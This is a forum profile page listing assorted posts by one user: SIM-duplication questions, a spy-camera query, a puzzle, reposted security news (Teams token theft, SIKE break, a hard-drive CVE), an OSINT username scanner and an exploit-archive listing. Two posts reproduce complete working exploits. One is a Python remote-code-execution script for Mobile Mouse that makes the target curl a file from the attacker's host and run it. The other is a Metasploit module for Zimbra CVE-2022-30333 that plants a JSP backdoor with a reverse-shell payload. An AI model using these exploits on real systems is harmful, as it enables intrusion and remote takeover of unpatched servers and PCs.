Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Dude, nu-mi place sa folosesc cuvantul "clonez", doar vreau sa am doua cartele cu acelasi numar, sa nu functioneze simultan, unul pentru acasa iar al II-lea pentru serviciu
  2. Nu dude, poate sunt mecanic auto, sau lucrez pe sentier, sa nu sparg Android-ul, si, nu pot face redirect pe acelasi numar, cartelele sunt vechi, expirate, nu pot fi reactivate si, face redirectionare pe acelasi numar, scoate cartela, intro in jaf, si invers, am crezut ca poate axista vreo aplicatie pentru Android cu care sa nu functioneze ambele cartele simultan
  3. https://www.imyfone.com/mobile-transfer/how-to-clone-a-sim-card/
  4. am abonament, sim-ul este mort, e prepay expirat,k nu pot suna nici la 222, *133# nimic, asta vreau sa-l readuc la viata si sa functrioneze simultan
  5. Salut, vreau sa conectez un PC cu 4 porturi USB la un telefon, (remote control), am iOs si monitor asus de 17", vrem sa vizionam un film prin cablu USb, exista o aplicatie? Fara hardware, cablu USB, Yelefon iOS, monitor PC 17" Edit:/ Android Multumesc
  6. Salut, vreau sa plec la vanatoare/pescuit/picnic, nu stiu ce peripetii mai fac pe acolo... Vreau sa "salvez" nr. de telefon (SIM-ul), de pe un iOS (dual SIM) pe SIM vechi (anulat), pentru un a salva nr personal. telefon e.g. Nokia 3310, 5100 etc... Ideea este ca nu vreau sa functioneze simultan, vreau doar cand plec la drumetii sa am un nr. de contact, in caz de urgente, moare porcul, pisica, cainele, iar cel de acasa (personal) sa fie offline. Exista App care sa faca treaba asta? (in caz de ceva ajung acasa si ii dau on pe numarul personal, acelasi numar pe care l-a luat valul. Cu alte cuvinte, ma duc la vanatoare/pescuit/picnic ma impinge un prost in apa si cad cu tot cu tel, sa nu stric iOS-ul, sa am o rabla cu mine cu acelasi nr pe care il am in casa, nu sunt waterproof nici generatiile vechi nici cele noi, primele care sunt afectate sunt SIM-urile (patit). Sper ca ati inteles Thanks
  7. A Microsoft logo sits illuminated at the World Mobile Congress at the Fira Gran Via Complex on Feb. 22, 2016, in Barcelona, Spain. (Photo by David Ramos/Getty Images) Researchers on Tuesday reported that this past August they identified an attack path that lets malicious actors with file system access to steal credentials for any Microsoft Teams user who’s logged-on. In a Sept. 13 blog post, the Vectra Protect team said because attackers do not require elevated permissions to read these files, it exposes this potential concern to any attack that provides malicious actors with local or remote system access. The researchers said this vulnerability impacted all commercial and Government Community Cloud Desktop Team clients for Windows, Mac and Linux. Microsoft has been made aware of this issue and closed the case in late August, stating that it did not meet its bar for immediate servicing. The Vectra researchers said until Microsoft moves to update the Teams Desktop Application, they don’t recommend using the full Teams client and advise customers to consider using the web-based Teams application exclusively. The researchers said security teams should use the web-based Teams client inside Microsoft Edge, which has multiple OS-level controls to protect token leaks. They said the Teams web application is robust and supports most features enabled through the desktop client, keeping the organization’s productivity impacts to a minimum. For customers that must use the installed desktop application, the researchers said it’s critical to watch key application files for access by any processes other than the official Teams application. When asked Thursday if the situation had changed, Aaron Turner, CTO, SaaS Protect at Vectra, said to the Vectra team’s knowledge, Microsoft had not changed its stance. Turner said in Vectra’s interactions with customers, only those organizations with extreme exposure to sophisticated adversaries (defense contractors, critical infrastructure operators) are seriously considering eliminating the Teams.exe application on endpoints and forcing users to collaborate through Teams via a managed browser. Turner said most of the organizations he has talked to plan on implementing an endpoint detection and response monitoring policy to watch for any situations of unauthorized access by a system process to the file storage locations where the tokens are stored. Turner added that the work Vectra’s Connor Peoples spearheaded to discover this vulnerability and coordinate his findings with Microsoft is part of Vectra's efforts to help make the Microsoft 365 ecosystem a safer and fairer place for any organization to communicate and collaborate. As outlined in the research, Turner said there are some improvements that Microsoft can make to shore up the Electron application for Windows and MacOS. He said those improvements should also help prevent future vulnerabilities, such as other recently disclosed problems relating to XSS attacks and potential command and control activity using GIFs. Sammy Migues, principal scientist at Synopsys Software Integrity Group, said like every application framework, Electron has its own idiosyncrasies related to authentication, secure file storage, and communications. Migues said development teams use frameworks for the same reason they use lots of other open source — it makes their jobs easier and faster. On the other hand, even security-aware teams might not understand what’s really going on in the depths of the framework they’re using. Migues said In this case, it appears that Electron might save some sensitive data in an insecure way. Via scmagazine.com/
  8. # Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269 68616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(5) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) sleep(0.8) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(50) s.close() # 0day.today [2022-09-11] # Source: 0day.today
      • 1
      • Like
  9. Parental Control, il pune pe mod avion, ii cumperi un fard in fapt
  10. Este scris de tine articolul? Argus?
  11. Bun concept, asta in cazul in care nu ai intentii de Supermarket, de nu-mi primesc facturile de gaze. ON: poti face conversie din html, http, csf, ncsf in ce vrei tu cu grep, le importi (cu plata) in smsglobal, (daca ai subscribe) sa fie legit sau, ... revin cu un edit
  12. Another reason not to play 1989's Rhythm Nation – it messes with some hard disk drives The music video for Janet Jackson's 1989 pop hit Rhythm Nation has been recognized as an exploit for a cybersecurity vulnerability after Microsoft reported it can crash old laptop computers. The story detailed how "a major computer manufacturer discovered that playing the music video for Janet Jackson's Rhythm Nation would crash certain models of laptops." Further investigation revealed that multiple manufacturers' machines also crashed. Sometimes playing the video on one laptop would crash another nearby laptop. This is mysterious because the song isn't actually that bad. Investigation revealed that all the crashing laptops shared the same 5400 RPM hard disk drive. The manufacturer that found the problem apparently added a custom filter in the audio pipeline to detect and remove the offending frequencies during audio playback. Few modern machines have hard disk drives, never mind drives that rotate at the unfashionably slow speed of 5400 revolutions per minute. Also, hardly anybody listens to Janet Jackson anymore. The Register nonetheless reports this news because The Mitre Corporation has seen fit to list it on the register of Common Vulnerabilities and Exposures (CVEs) – the definitive list of cybersecurity vulnerabilities we all need to watch out for. It's listed as CVE-2022-38392 and has already been acknowledged by security vendor Tenable. OK, so you've air-gapped that PC. Cut the speakers. Covered the LEDs. Disconnected the monitor. Now, about the data-leaking power supply unit … APIC fail: Intel 'Sunny Cove' chips with SGX spill secrets Real-time deepfakes can be beaten by a sideways glance While the bug seems comical, side-channel attacks are a real threat. Israeli researcher Mordechai Guri has found ways to attack computers including by making memory emit radiation in the same bands used by Wi-Fi and encoding information into those emissions. Owners of laptops with old, slow, hard disks therefore need to be very careful if they hear Janet Jackson tunes while they work – which is why we've not embedded Rhythm Nation in this story. But it does feel safe to remind readers of the weirdest bug The Register has previously encountered: Cisco's alert about cosmic rays crashing some kit. ® Via theregister.com
  13. ( A simple text editor on the web where you can write and compute. ) Alain Marty | last update: 2022/08/15 UR: http://lambdaway.free.fr/lambdawalks/
  14. Similar cu DALL-E 2.0 Midjourney is an independent research lab exploring new mediums of thought and expanding the imaginative powers of the human species. There are two ways to experience the tools: the Midjourney Bot, which you can use to generate images, and the web app at https://www.midjourney.com/app/ , where you can find a gallery of your own work and other users' creations. You can use our Midjourney Bot on our official Discord server (https://discord.gg/midjourney) as well as on any other Discord server where it has been set up. If you wish to invite the bot to your own community, follow the instructions on this page: Use Midjourney on your own Discord Server. URL: https://www.midjourney.com/home/ Primit de la un coleg. Enjoy!
  15. Kev

    Puzzle

    L-am rezolvat si eu, a fost mai dificil, Figure #49 Lasa-mi o adresa in PM cu EGLD (Elrond), BTC are fee-ul mare. P.S. postez rezolvarea pt. Figure #50, am uitat sa inregistrez
  16. Kev

    Puzzle

    Salut, incercãm sa trecem un test puzzle https://figure.game cu IQ peste medie, de fiecare data ramanem blocati la ultima piesã, din 10moves left, ramanem cu una, il rezolva cineva? Are o sticla cu vin in crypto. Edit: 3 mutãri, rãmânem cu o piesa, teasing? P.S. moderatorii in cazul in care am postat gresit si nu in Challenges (CTF) , se poate muta/delete sau Trash. P.S.2. pimul venit, primul servit Enjoy!
  17. Kev

    Camera Mini - Wifi

    Bun, am inteles, este praf, ceva identic de calitate? am intrat in resurse mai am 130 ron (tigari). Fara cabluri, vreau sa o atasez in exterior in coltul usii, fara cabluri, fara ciuruit peretii, etc,,,
  18. Salut, Caut de ceva timp (cateva luni), o mini-viedo camera pentru a supravghea biroul din exterior, Ce am gasit in Facebook ads din intamplare, este: https://oricare.ro/products/camera-wifi-mini Nu vreau sa gauresc peretii, vreau sa o amplasez in exterior. ^ are autonomie de 120 min. am gasit la 69 ron cu autonomie 180 min. Sunt de incredere? Buget maxim 150 RON @Wav3 Ce recomandati? Sigur. Multumesc
  19. socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases: Reserved keywords: Most platforms have a set of keywords that they don’t allow to be used in usernames (A simple test: try checking reserved words like ‘admin’ or ‘home’ or ‘root’ and see if other services mark them as available) Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses. socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies. Install Socialscan Command-Line Tool To Check For Email And Social Media Username Usage pip > pip install socialscan > git clone https://github.com/iojw/socialscan.git > cd socialscan > pip install . ocialscan Command-Line Tool To Check For Email And Social Media Username Usage usage: socialscan [list of usernames/email addresses to check] optional arguments: -h, --help show this help message and exit --platforms [platform [platform ...]], -p [platform [platform ...]] list of platforms to query (default: all platforms) --view-by {platform,query} view results sorted by platform or by query (default: query) --available-only, -a only print usernames/email addresses that are available and not in use --cache-tokens, -c cache tokens for platforms requiring more than one HTTP request (Snapchat, GitHub, Instagram. Lastfm & Tumblr), reducing total number of requests sent --input input.txt, -i input.txt file containg list of queries to execute --proxy-list proxy_list.txt file containing list of HTTP proxy servers to execute queries with --verbose, -v show query responses as they are received --show-urls display profile URLs for usernames on supported platforms (profiles may not exist if usernames are reserved or belong to deleted/banned accounts) --json json.txt output results in JSON format to the specified file --version show program's version number and exit You can download Socialscan here: socialscan-v1.4.2.zip Or read more here. Sources: darknet.org.uk github.com
  20. This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::Format::RarSymlinkPathTraversal def initialize(info = {}) super( update_info( info, 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)', 'Description' => %q{ This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier) }, 'Author' => [ 'Simon Scannell', # Discovery / initial disclosure (via Sonar) 'Ron Bowes', # Analysis, PoC, and module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-30333'], ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'], ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'], ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'], ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Zimbra Collaboration Suite', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/', 'TARGET_FILENAME' => nil, 'DisablePayloadHandler' => false, 'RPORT' => 443, 'SSL' => true }, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-06-28', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']), # Separating the path, filename, and extension allows us to randomize the filename OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']), OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), ] ) register_advanced_options( [ OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']), OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), # Took this from multi/handler OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) ] ) end # Generate an on-system filename using datastore options def generate_target_filename if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?') end File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp") end # Normalize the path traversal and figure out where it is relative to the web root def zimbra_get_public_path(target_filename) # Normalize the path normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath # Figure out where it is, relative to the webroot webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/') relative_path = normalized_path.relative_path_from(webroot) # Hopefully, we found a path from the webroot to the payload! if relative_path.to_s.start_with?('../') return nil end relative_path end def exploit print_status('Encoding the payload as a .jsp file') payload = Msf::Util::EXE.to_jsp(generate_payload_exe) # Create a file target_filename = generate_target_filename print_status("Target filename: #{target_filename}") begin rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload) rescue StandardError => e fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}") end file_create(rar) print_good('File created! Email the file above to any user on the target Zimbra server') # Bail if they don't want the payload triggered return unless datastore['TRIGGER_PAYLOAD'] # Get the public path for triggering the vulnerability, terminate if we # can't figure it out public_filename = zimbra_get_public_path(target_filename) if public_filename.nil? print_warning('Could not determine the public web path, disabling payload triggering') return end register_file_for_cleanup(target_filename) interval = datastore['CheckInterval'].to_i print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...") # This loop is mostly from `multi/handler` stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i timeout = datastore['ListenerTimeout'].to_i loop do break if session_created? break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(public_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') end Rex::ThreadSafe.sleep(interval) end end end Source
  21. clean, de ce? https://www.virustotal.com/gui/url/d73aa4df76343576171630f7e897bf5cf19d7688ae83035a2387278e4cbfe939?nocache=1
  22. Leave it to mathematicians to muck up what looked like an impressive new algorithm. In the US government's ongoing campaign to protect data in the age of quantum computers, a new and powerful attack that used a single traditional computer to completely break a fourth-round candidate highlights the risks involved in standardizing the next generation of encryption algorithms. Last month, the US Department of Commerce's National Institute of Standards and Technology, or NIST, selected four post-quantum computing encryption algorithms to replace algorithms like RSA, Diffie-Hellman, and elliptic curve Diffie-Hellman, which are unable to withstand attacks from a quantum computer. In the same move, NIST advanced four additional algorithms as potential replacements pending further testing in hopes one or more of them may also be suitable encryption alternatives in a post-quantum world. The new attack breaks SIKE, which is one of the latter four additional algorithms. The attack has no impact on the four PQC algorithms selected by NIST as approved standards, all of which rely on completely different mathematical techniques than SIKE. Getting totally SIKEd SIKE—short for Supersingular Isogeny Key Encapsulation—is now likely out of the running thanks to research that was published over the weekend by researchers from the Computer Security and Industrial Cryptography group at KU Leuven. The paper, titled An Efficient Key Recovery Attack on SIDH (Preliminary Version), described a technique that uses complex mathematics and a single traditional PC to recover the encryption keys protecting the SIKE-protected transactions. The entire process requires only about an hour’s time. The feat makes the researchers, Wouter Castryck and Thomas Decru eligible for a $50,000 reward from NIST. The advent of public key encryption in the 1970s was a major breakthrough because it allowed parties who had never met to securely trade encrypted material that couldn’t be broken by an adversary. Public key encryption relies on asymmetric keys, with one private key used to decrypt messages and a separate public key for encrypting. Users make their public key widely available. As long as their private key remains secret, the scheme remains secure. In practice, public key cryptography can often be unwieldy, so many systems rely on key encapsulation mechanisms, which allow parties who have never met before to jointly agree on a symmetric key over a public medium such as the Internet. In contrast to symmetric-key algorithms, key encapsulation mechanisms in use today are easily broken by quantum computers. SIKE, before the new attack, was thought to avoid such vulnerabilities by using a complex mathematical construction known as a supersingular isogeny graph. The cornerstone of SIKE is a protocol called SIDH, short for Supersingular Isogeny Diffie-Hellman. The research paper published over the weekend shows how SIDH is vulnerable to a theorem known as “glue-and-split” developed by mathematician Ernst Kani in 1997, as well as tools devised by fellow mathematicians Everett W. Howe, Franck Leprévost, and Bjorn Poonen in 2000. The new technique builds on what’s known as the “GPST adaptive attack,” described in a 2016 paper. The math behind the latest attack is guaranteed to be impenetrable to most non-mathematicians. Here’s about as close as you’re going to get: “The attack exploits the fact that SIDH has auxiliary points and that the degree of the secret isogeny is known,” Steven Galbraith, a University of Auckland mathematics professor and the “G” in the GPST adaptive attack, explained in a short writeup on the new attack. “The auxiliary points in SIDH have always been an annoyance and a potential weakness, and they have been exploited for fault attacks, the GPST adaptive attack, torsion point attacks, etc. He continued: Let E_0 be the base curve and let P_0, Q_0 \in E_0 have order 2^a. Let E, P, Q be given such that there exists an isogeny \phi of degree 3^b with \phi : E_0 \to E, \phi(P_0) = P, and \phi(Q_0) = Q. A key aspect of SIDH is that one does not compute \phi directly, but as a composition of isogenies of degree 3. In other words, there is a sequence of curves E_0 \to E_1 \to E_2 \to \cdots \to E connected by 3-isogenies. Essentially, like in GPST, the attack determines the intermediate curves E_i and hence eventually determines the private key. At step i the attack does a brute-force search of all possible E_i \to E_{i+1}, and the magic ingredient is a gadget that shows which one is correct. (The above is over-simplified, the isogenies E_i \to E_{i+1} in the attack are not of degree 3 but of degree a small power of 3.) More important than understanding the math, Jonathan Katz, an IEEE Member and professor in the department of computer science at the University of Maryland, wrote in an email: “the attack is entirely classical, and does not require quantum computers at all.” Lessons learned SIKE is the second NIST-designated PQC candidate to be invalidated this year. In February, IBM post-doc researcher Ward Beullens published research that broke Rainbow, a cryptographic signature scheme with its security, according to Cryptomathic, “relying on the hardness of the problem of solving a large system of multivariate quadratic equations over a finite field.” NIST’s PQC replacement campaign has been running for five years. Here’s a brief history: 1st round (2017)—69 candidates 2nd round (2019)—26 surviving candidates 3rd round (2020)—7 finalists, 8 alternates 4th round (2022)—3 finalists and 1 alternate selected as standards. SIKE and three additional alternates advanced to a fourth round. Rainbow fell during Round 3. SIKE had made it until Round 4. Katz continued: I asked Jao, the SIKE co-inventor, why the weakness had come to light only now, in a relatively later stage of its development. His answer was insightful. He said: The version of SIKE submitted to NIST used a single step to generate the key. A possible variant of SIKE could be constructed to take two steps. Jao said that it’s possible that this latter variant might not be susceptible to the math causing this breakage. For now, though, SIKE is dead, at least in the current running. The schedule for the remaining three candidates is currently unknown. Source: arstechnica.com
  23. This archive contains all of the 68 exploits added to Packet Storm in July, 2022. Content: Directory of 202207-exploits\2207-exploits 08/02/2022 11:41 PM <DIR> . 08/02/2022 11:41 PM <DIR> .. 07/19/2022 05:55 PM 1,489 asusgamesdk1004-unquotedpath.txt 07/05/2022 05:14 PM 1,790 atm56-sql.txt 07/01/2022 06:13 PM 1,678 bigbluebutton23-xss.txt 07/01/2022 05:50 PM 479 classifiedlisting229-xss.txt 07/21/2022 11:33 PM 8,293 codoforum51-exec.txt 07/29/2022 05:23 PM 756 crs10-xss.txt 07/25/2022 07:02 PM 549 CVE-2022-35911.sh.txt 07/21/2022 10:53 PM 468,395 DASDEC-XSS.pdf 07/29/2022 05:11 PM 3,826 dingtian31276A-bypass.txt 07/04/2022 05:23 PM 1,787 douphp12-sql.txt 07/21/2022 11:20 PM 1,615 drfone408-unquotedpath.txt 07/20/2022 07:40 PM 13,866 emporiumecommcms12-sql.txt 07/06/2022 06:25 PM 7,001 eqsintegrityline-xss.txt 07/26/2022 06:07 PM 8,840 expertxjprb10-sql.txt 07/29/2022 05:28 PM 1,757 geonetwork420-xml.txt 07/26/2022 06:09 PM 2,984 gms10-shell.txt 07/05/2022 05:11 PM 3,872 GS20220705135846.tgz 07/06/2022 06:33 PM 10,071 GS20220706153018.txt 07/06/2022 06:37 PM 6,127 GS20220706153551.tgz 07/07/2022 04:14 PM 6,804 GS20220707131306.tgz 07/11/2022 05:08 PM 1,195 GS20220711140800.txt 07/11/2022 05:12 PM 6,253 GS20220711141006.tgz 07/11/2022 05:15 PM 8,003 GS20220711141406.tgz 07/15/2022 05:57 PM 8,840 GS20220715145633.tgz 07/15/2022 05:59 PM 3,306 GS20220715145905.tgz 07/21/2022 11:39 PM 9,212 GS20220721203759.tgz 07/26/2022 06:12 PM 4,292 his10-sql.txt 07/21/2022 11:18 PM 5,973 iotransfer40-exec.txt 07/01/2022 06:15 PM 2,993 jahx221-exec.txt 07/12/2022 11:03 PM 3,801 jboss_remoting_unified_invoker_rce.rb.txt 07/21/2022 11:28 PM 757 kite120216100-unquotedpath.txt 07/28/2022 05:50 PM 4,830 loanmgmtsys10-sql.txt 07/29/2022 05:02 PM 649 loanms10-xss.txt 07/06/2022 06:20 PM 2,030 magnoliacms6219-xss.txt 07/25/2022 06:57 PM 12,766 mmves12-sql.txt 07/04/2022 05:24 PM 7,402 MVID-2022-0620.txt 07/05/2022 05:20 PM 3,213 MVID-2022-0621.txt 07/18/2022 07:38 PM 1,955 MVID-2022-0622.txt 07/18/2022 07:40 PM 2,161 MVID-2022-0623.txt 07/18/2022 07:42 PM 3,655 MVID-2022-0624.txt 07/22/2022 07:26 PM 2,698 MVID-2022-0625.txt 07/11/2022 05:19 PM 5,262 nginx1200-dos.txt 07/21/2022 11:29 PM 9,002 octobotwi043-exec.txt 07/18/2022 07:37 PM 1,460 orangestation10-sql.txt 07/04/2022 05:22 PM 708 paymoney33-xss.txt 07/26/2022 06:04 PM 1,984 pcprotectep517470-escalate.txt 07/18/2022 07:36 PM 13,878 pls31-sql.txt 07/14/2022 05:18 PM 176,787 prestashop1767-xssupload.pdf 07/26/2022 06:17 PM 3,946 roxy_wi_exec.rb.txt 07/29/2022 05:17 PM 1,034 rpcpy060-exec.txt 07/11/2022 05:20 PM 5,218 Sashimi-Evil-OctoBot-Tentacle-master.zip 07/19/2022 06:02 PM 13,369 SCHUTZWERK-SA-2022-003.txt 07/04/2022 05:20 PM 1,313 sms2020-sql.txt 07/13/2022 08:29 PM 6,129 sourcegraph_gitserver_sshcmd.rb.txt 07/18/2022 07:30 PM 11,346 tts10-sql.txt 07/01/2022 05:49 PM 2,019 typeorm-sql.txt 07/29/2022 05:14 PM 2,426 wptransposh107-auth.txt 07/29/2022 05:05 PM 2,540 wptransposh107-xss.txt 07/29/2022 05:07 PM 3,192 wptransposh107persistent-xss.txt 07/29/2022 05:31 PM 2,487 wptransposh1081-auth.txt 07/29/2022 05:26 PM 2,365 wptransposh1081-disclose.txt 07/29/2022 05:40 PM 2,496 wptransposh1081-exec.txt 07/29/2022 05:38 PM 2,953 wptransposh1081-sql.txt 07/29/2022 05:21 PM 2,954 wptransposh1081-xsrf.txt 07/29/2022 04:59 PM 823 wpuseronline2876-xss.txt 07/11/2022 05:23 PM 1,532 wpvsbb329-sql.txt 07/01/2022 06:17 PM 4,029 ZSL-2022-5709.txt 07/21/2022 11:34 PM 6,572 ZSL-2022-5710.txt 69 File(s) 935,787 bytes 2 Dir(s) 41,100,783,616 bytes free Download: 202207-exploits.tgz (553.9 KB) Source
  24. In main page, m-am exprimat gresit Da, poker, etc... I-am pus conset, iar userul trebuie sa completeze data de nastere
  25. Joining a Wi‑Fi network By specifying the SSID, encryption type, password/passphrase, and if the SSID is hidden or not, mobile device users can quickly scan and join networks without having to manually enter the data.[49] A MECARD-like format is supported by Android and iOS 11+.[50] Try free now Source: wikipedia
×
×
  • Create New...